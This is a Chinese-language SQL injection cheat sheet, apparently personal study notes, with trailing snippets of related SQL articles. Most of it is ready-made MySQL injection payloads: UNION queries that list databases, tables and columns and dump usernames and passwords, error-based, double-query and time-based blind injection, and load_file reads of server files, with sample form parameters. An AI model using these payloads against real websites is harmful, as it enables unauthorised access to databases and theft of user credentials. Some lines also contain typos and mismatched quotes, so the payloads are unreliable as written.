union select 1,database(),2231 %23//查詢當前資料庫union select 1,group_concat(schema_name),3 from information_schema.schemata %23
union select 1,group_concat(table_name),2231 from information_schema.tables where table_schema=database() %23 查詢當前資料庫的所有表名
union select 1,group_concat(column_name),2231 from information_schema.columns where table_schema=database() and table_name=『users』 %23查詢當前資料庫裡的表的字段
union select 1,group_concat(username),group_concat(password) from security.users %23查詢字段裡面的內容
union select 1,group_concat(schema_name),333 from information_schema.schemata %23查詢所有資料庫
union select 1,2,3,4 %23 測試列數
order by+數字 測試列數
–+也是注釋
and 0 為假
後台語句(id前面的語句):select username,password,from user where id=???
post注入測試:』』 or 1 %23』
時間盲注 or sleep3 3秒後返回 id=1』 or if((select table_name。。。),sleep(2),0)
select 列名稱 from 表名稱 where 列 運算子 值 、、分析報錯
select login_name,password from admin where id=*** and passwd=6ba8743ee048a220分析報錯
id=-1 union select 1,group_concat(table_name),2231 from information_schema.tables where table_schema=database() %23獲取當前資料庫的所有表名
id=-1 union select 1,group_concat(column_name),2231 from information_schema.clumns where table_name='user』獲取表裡的字段
id=-1 union select 1,group_concat(column_name),2231 from user 獲取字段裡面的值
user=1』 or true union select group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1 %23
查詢資料庫表名:
union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
獲取字段:
union select 1,1,group_concat(column_name) from information_schema.columns where table_name=『表明』
獲取使用者名稱和密碼:
1.union select 列名稱 from 表名稱 where (列 運算子 值 )(查詢)
2.union select 1,group_concat(),group_concat() from 表名%23
↑合併當前下所有欄位的所有資料
") union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() %23
報錯注入查詢表明 union select 1,extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1))) %23 zbh&pass=12345&pass2=12345&yaoqing=
union select 1,extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) %23 zbh&pass=12345&pass2=12345&yaoqing=
報錯注入查詢字段 union select 1,extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name=『regid』 limit 2,1))) %23 zbh&pass=12345&pass2=12345&yaoqing=
撥錯注入查詢字段內容 union select 1,extractvalue(1,concat(0x7e,(select yaoqingma from regid))) %23 zbh&pass=12345&pass2=12345&yaoqing=
雙注入表明uname=admin』 union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select table_name from information_schema.tables where table_schema=database()limit 0,1 )) %23 &passwd=123&submit=submit
欄位uname=admin』 union select 1,count(1) from information_schema.tables group by concat(floor(rand()*2),(select column_name from information_schema.columns where table_name=『emails』 limit 1,1 )) %23 &passwd=123&submit=submit
讀取 union select 1,2, hex(load_file(「d:\xampp\htdocs\less-1\index.php」)) %23
字段內容 or updatexml(2,concat(0x7e,(select email from member limit 0,1)),0)
limit注入: procedure analyse(extractvalue(rand(),concat(0x3a,(select password from mydbs.user limit 2,1))),1)%23&num=1
SQL注入語句
對於sql語句注入來說 最重要的是利用其系統已存在的乙個information.schema 其中schemata是用來查詢庫名稱 tables用來查詢表名稱 columns用來查詢列名稱 order by語句用來判斷當前庫的列數 select用來查詢庫中的資訊 關於sql注入的相關流程 1.首先判...
《SQL語句大全》
語 句 功 能 資料操作 select 從資料庫表中檢索資料行和列 insert 向資料庫表新增新資料行 delete 從資料庫表中刪除資料行 update 更新資料庫表中的資料 資料定義 create table 建立乙個資料庫表 drop table 從資料庫中刪除表 alter table 修...
SQL語句大全
建表 create table tab1 id counter,name string,age integer,date datetime 技巧 自增字段用 counter 宣告.欄位名為關鍵字的字段用方括號括起來,數字作為欄位名也可行.建立索引 下面的語句在tab1的date列上建立可重複索引 c...